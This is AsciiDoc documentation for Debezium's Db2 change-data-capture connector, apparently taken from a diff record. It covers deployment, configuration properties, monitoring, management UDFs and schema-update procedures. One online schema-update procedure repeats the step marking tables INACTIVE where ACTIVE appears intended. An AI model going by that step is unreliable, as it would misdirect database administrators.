`oc apply -f inventory-connector.yaml`
+
This registers `inventory-connector` and the connector starts to run against the `inventory` database.

. Verify that the connector was created and has started to capture changes in the specified database. You can verify the connector instance by watching the Kafka Connect log output as, for example, `inventory-connector` starts.

.. Display the Kafka Connect log output:
+
[source,shell,options="nowrap"]
----
oc logs $(oc get pods -o name -l strimzi.io/name=my-connect-cluster-connect)
----

.. Review the log output to verify that the initial snapshot has been executed. You should see something like the following lines:
+
[source,shell,options="nowrap"]
----
... INFO Starting snapshot for ...
... INFO Snapshot is using user 'debezium' ...
----

endif::product[]

.Results

When the connector starts, it {link-prefix}:{link-db2-connector}#db2-snapshots[performs a consistent snapshot] of the Db2 database tables that the connector is configured to capture changes for.
The connector then starts generating data change events for row-level operations and streaming change event records to Kafka topics.

// Type: reference
// ModuleID: descriptions-of-debezium-db2-connector-configuration-properties
// Title: Descriptions of {prodname} Db2 connector configuration properties
[[db2-connector-properties]]
=== Connector properties

The {prodname} Db2 connector has numerous configuration properties that you can use to achieve the right connector behavior for your application. Many properties have default values. Information about the properties is organized as follows:

* xref:db2-required-configuration-properties[Required configuration properties]
* xref:db2-advanced-configuration-properties[Advanced configuration properties]
* xref:db2-pass-through-properties[Pass-through configuration properties]

[id="db2-required-configuration-properties"]
The following configuration properties are _required_ unless a default value is available.

.Required connector configuration properties
[cols="30%a,25%a,45%a",options="header"]
|===
|Property |Default |Description

|[[db2-property-name]]<<db2-property-name, `+name+`>>
|
|Unique name for the connector. Attempting to register again with the same name will fail. This property is required by all Kafka Connect connectors.

|[[db2-property-connector-class]]<<db2-property-connector-class, `+connector.class+`>>
|
|The name of the Java class for the connector. Always use a value of `io.debezium.connector.db2.Db2Connector` for the Db2 connector.

|[[db2-property-tasks-max]]<<db2-property-tasks-max, `+tasks.max+`>>
|`1`
|The maximum number of tasks that should be created for this connector. The Db2 connector always uses a single task and therefore does not use this value, so the default is always acceptable.

|[[db2-property-database-hostname]]<<db2-property-database-hostname, `+database.hostname+`>>
|
|IP address or hostname of the Db2 database server.

|[[db2-property-database-port]]<<db2-property-database-port, `+database.port+`>>
|`50000`
|Integer port number of the Db2 database server.

|[[db2-property-database-user]]<<db2-property-database-user, `+database.user+`>>
|
|Name of the Db2 database user for connecting to the Db2 database server.

|[[db2-property-database-password]]<<db2-property-database-password, `+database.password+`>>
|
|Password to use when connecting to the Db2 database server.

|[[db2-property-database-dbname]]<<db2-property-database-dbname, `+database.dbname+`>>
|
|The name of the Db2 database from which to stream the changes.

|[[db2-property-database-server-name]]<<db2-property-database-server-name, `+database.server.name+`>>
|
|Logical name that identifies and provides a namespace for the particular Db2 database server that hosts the database for which {prodname} is capturing changes. Only alphanumeric characters and underscores should be used in the database server logical name.
The logical name should be unique across all other connectors, since it is used as a topic name prefix for all Kafka topics that receive records from this connector.

|[[db2-property-database-history-kafka-topic]]<<db2-property-database-history-kafka-topic, `+database.history.kafka.topic+`>>
|
|The full name of the Kafka topic where the connector stores the database schema history.

|[[db2-property-database-history-kafka-bootstrap-servers]]<<db2-property-database-history-kafka-bootstrap-servers, `+database.history.kafka.bootstrap.servers+`>>
|
|A list of host/port pairs that the connector uses to establish an initial connection to the Kafka cluster. This connection is used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. Each pair should point to the same Kafka cluster used by the {prodname} Kafka Connect process.

|[[db2-property-table-include-list]]<<db2-property-table-include-list, `+table.include.list+`>>
|
|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you want the connector to capture. Any table not included in the include list does not have its changes captured. Each identifier is of the form _schemaName_._tableName_. By default, the connector captures changes in every non-system table. Do not also set the `table.exclude.list` property.

|[[db2-property-table-exclude-list]]<<db2-property-table-exclude-list, `+table.exclude.list+`>>
|
|An optional, comma-separated list of regular expressions that match fully-qualified table identifiers for tables whose changes you do not want the connector to capture. The connector captures changes in each non-system table that is not included in the exclude list. Each identifier is of the form _schemaName_._tableName_. Do not also set the `table.include.list` property.

|[[db2-property-column-exclude-list]]<<db2-property-column-exclude-list, `+column.exclude.list+`>>
|_empty string_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns to exclude from change event values.
Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.
Primary key columns are always included in the event's key, even if they are excluded from the value.

|[[db2-property-column-mask-hash]]<<db2-property-column-mask-hash, `+column.mask.hash._hashAlgorithm_.with.salt._salt_+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be pseudonyms in change event values. A pseudonym is a field value that consists of the hashed value obtained by applying the `_hashAlgorithm_` algorithm and the `_salt_` salt that you specify in the property name. +
 +
Based on the hash algorithm applied, referential integrity is kept while data is masked. Supported hash algorithms are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation.
The hash value is automatically shortened to the length of the column. +
 +
You can specify multiple instances of this property with different algorithms and salts. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.
For example: +
 +
`column.mask.hash.SHA-256.with.salt.CzQMA0cB5K =` + `inventory.orders.customerName, inventory.shipment.customerName` +
 +
where `CzQMA0cB5K` is a randomly selected salt.
 +
Depending on the `_hashAlgorithm_` used, the `_salt_` selected, and the actual data set, the field value might not be completely masked.

|[[db2-property-time-precision-mode]]<<db2-property-time-precision-mode, `+time.precision.mode+`>>
|`adaptive`
| Time, date, and timestamps can be represented with different kinds of precision: +
 +
`adaptive` captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type. +
 +
`connect` always represents time and timestamp values by using Kafka Connect's built-in representations for `Time`, `Date`, and `Timestamp`, which use millisecond precision regardless of the database columns' precision. See {link-prefix}:{link-db2-connector}#db2-temporal-values[temporal values].

|[[db2-property-tombstones-on-delete]]<<db2-property-tombstones-on-delete, `+tombstones.on.delete+`>>
|`true`
| Controls whether a tombstone event should be generated after a _delete_ event. +
 +
`true` - delete operations are represented by a _delete_ event and a subsequent tombstone event. +
 +
`false` - only a _delete_ event is sent. +
 +
After a _delete_ operation, emitting a tombstone event enables Kafka to delete all change event records that have the same key as the deleted row.

|[[db2-property-include-schema-changes]]<<db2-property-include-schema-changes, `+include.schema.changes+`>>
|`true`
|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database history.

|[[db2-property-column-truncate-to-length-chars]]<<db2-property-column-truncate-to-length-chars, `+column.truncate.to._length_.chars+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event records, values in these columns are truncated if they are longer than the number of characters specified by _length_ in the property name. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer, for example, `column.truncate.to.20.chars`.

|[[db2-property-column-mask-with-length-chars]]<<db2-property-column-mask-with-length-chars, `+column.mask.with._length_.chars+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns. Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_. In change event values, the values in the specified table columns are replaced with _length_ number of asterisk (`*`) characters. You can specify multiple properties with different lengths in a single configuration. Length must be a positive integer or zero.
When you specify zero, the connector replaces a value with an empty string.

|[[db2-property-column-propagate-source-type]]<<db2-property-column-propagate-source-type, `+column.propagate.source.type+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_. +
 +
For each specified column, the connector adds the column's original type and original length as parameters to the corresponding field schemas in the emitted change records. The following added schema parameters propagate the original type name and also the original length for variable-width types: +
 +
`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +
 +
This property is useful for properly sizing corresponding columns in sink databases.

|[[db2-property-datatype-propagate-source-type]]<<db2-property-datatype-propagate-source-type, `+datatype.propagate.source.type+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the database-specific data type name for some columns. Fully-qualified data type names are of the form _databaseName_._tableName_._typeName_, or _databaseName_._schemaName_._tableName_._typeName_. +
 +
For these data types, the connector adds parameters to the corresponding field schemas in emitted change records. The added parameters specify the original type and length of the column: +
 +
`pass:[_]pass:[_]debezium.source.column.type` + `pass:[_]pass:[_]debezium.source.column.length` + `pass:[_]pass:[_]debezium.source.column.scale` +
 +
These parameters propagate a column's original type name and length, for variable-width types, respectively. This property is useful for properly sizing corresponding columns in sink databases. +
 +
See {link-prefix}:{link-db2-connector}#db2-data-types[Db2 data types] for the list of Db2-specific data type names.

|[[db2-property-message-key-columns]]<<db2-property-message-key-columns, `+message.key.columns+`>>
|_empty string_
|A semicolon-separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +
 +
Separate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format is: +
 +
_schema-name_._table-name_:_regexp_;... +
 +
For example, +
 +
`schemaA.table_a:regex_1;schemaB.table_b:regex_2;schemaC.table_c:regex_3` +
 +
If `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in ``table_a``'s `id` column to a key field in change events that the connector sends to Kafka.

|===

[id="db2-advanced-configuration-properties"]
The following _advanced_ configuration properties have defaults that work in most situations and therefore rarely need to be specified in the connector's configuration.

.Advanced connector configuration properties
[cols="30%a,25%a,45%a",options="header"]
|===
|Property |Default |Description

|[[db2-property-snapshot-mode]]<<db2-property-snapshot-mode, `+snapshot.mode+`>>
|`initial`
|Specifies the criteria for performing a snapshot when the connector starts: +
 +
`initial` - For tables in capture mode, the connector takes a snapshot of the schema for the table and the data in the table. This is useful for populating Kafka topics with a complete representation of the data. +
 +
`schema_only` - For tables in capture mode, the connector takes a snapshot of only the schema for the table. This is useful when only the changes that are happening from now on need to be emitted to Kafka topics. After the snapshot is complete, the connector continues by reading change events from the database's redo logs.

|[[db2-property-snapshot-isolation-mode]]<<db2-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>
|`repeatable_read`
|During a snapshot, controls the transaction isolation level and how long the connector locks the tables that are in capture mode. The possible values are: +
 +
`read_uncommitted` - Does not prevent other transactions from updating table rows during an initial snapshot. This mode has no data consistency guarantees; some data might be lost or corrupted. +
 +
`read_committed` - Does not prevent other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +
 +
`repeatable_read` - Prevents other transactions from updating table rows during an initial snapshot. It is possible for a new record to appear twice: once in the initial snapshot and once in the streaming phase. However, this consistency level is appropriate for data mirroring. +
 +
`exclusive` - Uses repeatable read isolation level but takes an exclusive lock for all tables to be read. This mode prevents other transactions from updating table rows during an initial snapshot. Only `exclusive` mode guarantees full consistency; the initial snapshot and streaming logs constitute a linear history.

|[[db2-property-event-processing-failure-handling-mode]]<<db2-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>
|`fail`
|Specifies how the connector handles exceptions during processing of events. The possible values are: +
 +
`fail` - The connector logs the offset of the problematic event and stops processing. +
 +
`warn` - The connector logs the offset of the problematic event and continues processing with the next event. +
 +
`skip` - The connector skips the problematic event and continues processing with the next event.

|[[db2-property-poll-interval-ms]]<<db2-property-poll-interval-ms, `+poll.interval.ms+`>>
|`1000`
|Positive integer value that specifies the number of milliseconds the connector should wait for new change events to appear before it starts processing a batch of events. Defaults to 1000 milliseconds, or 1 second.

|[[db2-property-max-queue-size]]<<db2-property-max-queue-size, `+max.queue.size+`>>
|`8192`
|Positive integer value for the maximum size of the blocking queue. The connector places change events that it reads from the database log into the blocking queue before writing them to Kafka. This queue can provide backpressure for reading change-data tables when, for example, writing records to Kafka is slower than it should be or Kafka is not available. Events that appear in the queue are not included in the offsets that are periodically recorded by the connector. The `max.queue.size` value should always be larger than the value of the `max.batch.size` connector configuration property.

|[[db2-property-max-batch-size]]<<db2-property-max-batch-size, `+max.batch.size+`>>
|`2048`
|Positive integer value that specifies the maximum size of each batch of events that the connector processes.

|[[db2-property-max-queue-size-in-bytes]]<<db2-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>
|`0`
|Long value for the maximum size in bytes of the blocking queue. This feature is disabled by default. It becomes active when the property is set to a positive long value.

|[[db2-property-heartbeat-interval-ms]]<<db2-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>
|`0`
|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +
 +
Heartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. +
 +
Heartbeat messages are useful when there are many updates in a database that is being tracked but only a tiny number of updates are in tables that are in capture mode. In this situation, the connector reads from the database transaction log as usual but rarely emits change records to Kafka. This means that the connector has few opportunities to send the latest offset to Kafka. Sending heartbeat messages enables the connector to send the latest offset to Kafka.

|[[db2-property-heartbeat-topics-prefix]]<<db2-property-heartbeat-topics-prefix, `+heartbeat.topics.prefix+`>>
|`__debezium-heartbeat`
|Specifies the prefix for the name of the topic to which the connector sends heartbeat messages. The format for this topic name is `<heartbeat.topics.prefix>.<server.name>`.

|[[db2-property-snapshot-delay-ms]]<<db2-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>
|
|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts.
If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause rebalancing of connectors.

|[[db2-property-snapshot-fetch-size]]<<db2-property-snapshot-fetch-size, `+snapshot.fetch.size+`>>
|`2000`
|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.

|[[db2-property-snapshot-lock-timeout-ms]]<<db2-property-snapshot-lock-timeout-ms, `+snapshot.lock.timeout.ms+`>>
|`10000`
|Positive integer value that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this interval, the snapshot fails. {link-prefix}:{link-db2-connector}#db2-snapshots[How the connector performs snapshots] provides details. Other possible settings are: +
 +
`0` - The connector immediately fails when it cannot obtain a lock. +
 +
`-1` - The connector waits infinitely.

|[[db2-property-snapshot-select-statement-overrides]]<<db2-property-snapshot-select-statement-overrides, `+snapshot.select.statement.overrides+`>>
|
|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events that the connector reads from the log. Specify a comma-separated list of fully-qualified table names in the form _schemaName.tableName_. +
 +
For each table that you specify, also specify another configuration property: `snapshot.select.statement.overrides._SCHEMA_NAME_._TABLE_NAME_`. For example: `snapshot.select.statement.overrides.customers.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +
 +
A possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.

|[[db2-property-sanitize-field-names]]<<db2-property-sanitize-field-names, `+sanitize.field.names+`>>
|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.

`false` if not.
|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].

|[[db2-property-provide-transaction-metadata]]<<db2-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>
|`false`
|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this.
See {link-prefix}:{link-db2-connector}#db2-transaction-metadata[Transaction metadata] for details.

|===
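
For example, a connector that should skip the initial data copy but still commit offsets regularly might combine several of the advanced properties above. The following fragment is a sketch only; the values are illustrative, not recommendations:

[source,json]
----
{
    "snapshot.mode": "schema_only",
    "heartbeat.interval.ms": "30000",
    "poll.interval.ms": "500",
    "max.batch.size": "2048",
    "max.queue.size": "8192"
}
----

Similarly, `snapshot.select.statement.overrides` pairs a table list with one `SELECT` property per table. A sketch with hypothetical schema, table, and column names:

[source,json]
----
{
    "snapshot.select.statement.overrides": "MYSCHEMA.ORDERS",
    "snapshot.select.statement.overrides.MYSCHEMA.ORDERS": "SELECT * FROM MYSCHEMA.ORDERS WHERE ORDER_ID > 100000"
}
----
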
[id="db2-pass-through-properties"]
.Pass-through connector configuration properties

The connector also supports _pass-through_ configuration properties that it uses when it creates Kafka producers and consumers:

* All connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history topic.

* All connector configuration properties that begin with the `database.history.consumer.` prefix are used (without the prefix) when creating the Kafka consumer that reads the database history when the connector starts.

For example, the following connector configuration properties {link-kafka-docs}.html#security_configclients[secure connections to the Kafka broker]:

[source,indent=0]
----
database.history.producer.security.protocol=SSL
database.history.producer.ssl.keystore.location=/var/private/ssl/kafka.server.keystore.jks
database.history.producer.ssl.keystore.password=test1234
database.history.producer.ssl.truststore.location=/var/private/ssl/kafka.server.truststore.jks
database.history.producer.ssl.truststore.password=test1234
database.history.producer.ssl.key.password=test1234
database.history.consumer.security.protocol=SSL
database.history.consumer.ssl.keystore.location=/var/private/ssl/kafka.server.keystore.jks
database.history.consumer.ssl.keystore.password=test1234
database.history.consumer.ssl.truststore.location=/var/private/ssl/kafka.server.truststore.jks
database.history.consumer.ssl.truststore.password=test1234
database.history.consumer.ssl.key.password=test1234
----

Be sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. Note that the Db2 connector uses the {link-kafka-docs}.html#newconsumerconfigs[new consumer].

Also, the connector passes configuration properties that start with `database.` to the JDBC URL, for example, `database.applicationName=debezium`.

// Type: assembly
// ModuleID: monitoring-debezium-db2-connector-performance
// Title: Monitoring {prodname} Db2 connector performance
[[db2-monitoring]]
== Monitoring

The {prodname} Db2 connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.

* {link-prefix}:{link-db2-connector}#db2-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.
* {link-prefix}:{link-db2-connector}#db2-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.
* {link-prefix}:{link-db2-connector}#db2-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.

{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.

// Type: reference
// ModuleID: monitoring-debezium-during-snapshots-of-db2-databases
// Title: Monitoring {prodname} during snapshots of Db2 databases
[[db2-monitoring-snapshots]]
[[db2-snapshot-metrics]]
=== Snapshot metrics

The *MBean* is `debezium.db2:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.

include::{partialsdir}/modules/all-connectors/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]

// Type: reference
// ModuleID: monitoring-debezium-db2-connector-record-streaming
// Title: Monitoring {prodname} Db2 connector record streaming
[[db2-monitoring-streaming]]
[[db2-streaming-metrics]]
=== Streaming metrics

The *MBean* is `debezium.db2:type=connector-metrics,context=streaming,server=_<database.server.name>_`.

include::{partialsdir}/modules/all-connectors/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]

// Type: reference
// ModuleID: monitoring-debezium-db2-connector-schema-history
// Title: Monitoring {prodname} Db2 connector schema history
[[db2-monitoring-schema-history]]
[[db2-schema-history-metrics]]
=== Schema history metrics

The *MBean* is `debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.

include::{partialsdir}/modules/all-connectors/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]

// Type: reference
// ModuleID: managing-debezium-db2-connectors
// Title: Managing {prodname} Db2 connectors
[[db2-management]]
== Management

After you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value, in which case you use the SQL `VALUES` statement to invoke them.
For other UDFs, use the SQL `CALL` statement.

.Descriptions of {prodname} management UDFs
[cols="1,4",options="header"]
|===
|Task |Command and notes

|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>
|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`

|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>
|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`

|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>
|`VALUES ASNCDC.ASNCDCSERVICES('status','asncdc');`

|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>
|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +
 +
Replace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.

|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>
|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`

|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>
|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +
 +
Do this after you put a table into capture mode or after you remove a table from capture mode.

|===

// Type: assembly
// ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors
// Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors
[[db2-schema-evolution]]
== Schema evolution

While a {prodname} Db2 connector can capture schema changes, to update a schema you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.

For each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode, then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.

[WARNING]
====
It is vital to execute a schema update procedure completely before a new schema update is applied to the same table. Consequently, the recommendation is to execute all DDL statements in a single batch so that the schema update procedure runs only once.
====

There are generally two procedures for updating table schemas:

* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]
* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]

Each approach has advantages and disadvantages.

// Type: procedure
// ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors
// Title: Performing offline schema updates for {prodname} Db2 connectors
[[db2-offline-schema-update]]
=== Offline schema update

You stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.

.Prerequisites

* One or more tables that are in capture mode require schema updates.

.Procedure
. Suspend the application that updates the database.
. Wait for the {prodname} connector to stream all unstreamed change event records.
. Stop the {prodname} connector.
. Apply all changes to the source table schema.
. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.
. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]
. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].
. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].
. In the ASN register table, mark the updated source tables as `ACTIVE`.
. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]
. Resume the application that updates the database.
. Restart the {prodname} connector.

// Type: procedure
// ModuleID: performing-online-schema-updates-for-debezium-db2-connectors
// Title: Performing online schema updates for {prodname} Db2 connectors
[[db2-online-schema-update]]
[[db2-hot-schema-update]]
=== Online schema update

An online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.

However, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.

.Prerequisites

* One or more tables that are in capture mode require schema updates.

.Procedure when adding a column to the end of a table

. Lock the source tables whose schema you want to change.
. In the ASN register table, mark the locked tables as `INACTIVE`.
. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]
. Apply all changes to the schemas for the source tables.
. Apply all changes to the schemas for the corresponding change-data tables.
. In the ASN register table, mark the source tables as `ACTIVE`.
. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]
. Optional. Restart the connector to see updated column names in change events.

.Procedure when adding a column to the middle of a table

. Lock the source table(s) to be changed.
. In the ASN register table, mark the locked tables as `INACTIVE`.
. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]
. For each source table to be changed:
.. Export the data in the source table.
.. Truncate the source table.
.. Alter the source table and add the column.
.. Load the exported data into the altered source table.
.. Export the data in the source table's corresponding change-data table.
.. Truncate the change-data table.
.. Alter the change-data table and add the column.
.. Load the exported data into the altered change-data table.
. In the ASN register table, mark the tables as `INACTIVE`.
. In the ASN register table, mark the tables as `INACTIVE`. This marks the old change-data tables as inactive: the data in them remains available, but the tables are no longer updated.
. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]
. Optional. Restart the connector to see updated column names in change events.
","old_contents":"// Category: debezium-using
// Type: assembly
[id="debezium-connector-for-db2"]
= {prodname} connector for Db2

:context: db2
ifdef::community[]

:toc:
:toc-placement: macro
:linkattrs:
:icons: font
:source-highlighter: highlight.js

toc::[]
endif::community[]

{prodname}'s Db2 connector can capture row-level changes in the tables of a Db2 database. This connector is strongly inspired by the {prodname} implementation of SQL Server, which uses a SQL-based polling model that puts tables into "capture mode". When a table is in capture mode, the {prodname} Db2 connector generates and streams a change event for each row-level update to that table.

A table that is in capture mode has an associated change-data table, which Db2 creates. For each change to a table that is in capture mode, Db2 adds data about that change to the table's associated change-data table. A change-data table contains an entry for each state of a row. It also has special entries for deletions. The {prodname} Db2 connector reads change events from change-data tables and emits the events to Kafka topics.

The first time a {prodname} Db2 connector connects to a Db2 database, the connector reads a consistent snapshot of the tables for which the connector is configured to capture changes. By default, this is all non-system tables. There are connector configuration properties that let you specify which tables to put into capture mode, or which tables to exclude from capture mode.

When the snapshot is complete, the connector begins emitting change events for committed updates to tables that are in capture mode. By default, change events for a particular table go to a Kafka topic that has the same name as the table. 
Applications and services consume change events from these topics.

[NOTE]
====
The connector uses the abstract syntax notation (ASN) libraries that come as a standard part of Db2 LUW (Db2 for Linux, UNIX and Windows) and which you can add to Db2 for z/OS.
To use ASN and hence this connector, you must have a license for the IBM InfoSphere Data Replication (IIDR) product.
However, IIDR does not need to be installed.
====

ifdef::community[]
The Db2 connector has been tested with Db2/Linux {db2-version}.
It is expected that the connector would also work on other platforms such as Windows,
and we'd love to get your feedback if you can confirm this to be the case.
endif::community[]

ifdef::product[]
The Db2 connector has been tested with Db2/Linux {db2-version}.
endif::product[]

ifdef::product[]
Information and procedures for using a {prodname} Db2 connector are organized as follows:

* xref:overview-of-debezium-db2-connector[]
* xref:how-debezium-db2-connectors-work[]
* xref:descriptions-of-debezium-db2-connector-data-change-events[]
* xref:how-debezium-db2-connectors-map-data-types[]
* xref:setting-up-db2-to-run-a-debezium-connector[]
* xref:deploying-debezium-db2-connectors[]
* xref:monitoring-debezium-db2-connector-performance[]
* xref:managing-debezium-db2-connectors[]
* xref:updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors[]

endif::product[]

// Type: concept
// Title: Overview of {prodname} Db2 connector
// ModuleID: overview-of-debezium-db2-connector
[[db2-overview]]
== Overview

The {prodname} Db2 connector is based on the link:https://www.ibm.com/support/pages/q-replication-and-sql-replication-product-documentation-pdf-format-version-101-linux-unix-and-windows[ASN Capture/Apply agents]
that enable SQL Replication in Db2. A capture agent:

* Generates change-data tables for tables that are in capture mode.
* Monitors tables in capture mode and stores change events for updates to those tables in their corresponding change-data tables.

The {prodname} connector uses a SQL interface to query change-data tables for change events.

The database administrator must put the tables for which you want to capture changes into capture mode. For convenience, and to automate testing, there are {link-prefix}:{link-db2-connector}#managing-debezium-db2-connectors[{prodname} user-defined functions (UDFs)] in C that you can compile and then use to do the following management tasks:

* Start, stop, and reinitialize the ASN agent
* Put tables into capture mode
* Create the replication (ASN) schemas and change-data tables
* Remove tables from capture mode

Alternatively, you can use Db2 control commands to accomplish these tasks.

After the tables of interest are in capture mode, the connector reads their corresponding change-data tables to obtain change events for table updates. The connector emits a change event for each row-level insert, update, and delete operation to a Kafka topic that has the same name as the changed table. This is default behavior that you can modify. Client applications read the Kafka topics that correspond to the database tables of interest and can react to each row-level change event.

Typically, the database administrator puts a table into capture mode in the middle of the life of a table. This means that the connector does not have the complete history of all changes that have been made to the table. 
Therefore, when the Db2 connector first connects to a particular Db2 database, it starts by performing a _consistent snapshot_ of each table that is in capture mode. After the connector completes the snapshot, the connector streams change events from the point at which the snapshot was made. In this way, the connector starts with a consistent view of the tables that are in capture mode, and does not drop any changes that were made while it was performing the snapshot.

{prodname} connectors are tolerant of failures. As the connector reads and produces change events, it records the log sequence number (LSN) of the change-data table entry. The LSN is the position of the change event in the database log. If the connector stops for any reason, including communication failures, network problems, or crashes, upon restarting it continues reading the change-data tables where it left off. This includes snapshots. That is, if the snapshot was not complete when the connector stopped, upon restart the connector begins a new snapshot.

// Type: assembly
// ModuleID: how-debezium-db2-connectors-work
// Title: How {prodname} Db2 connectors work
[[how-the-db2-connector-works]]
== How the connector works

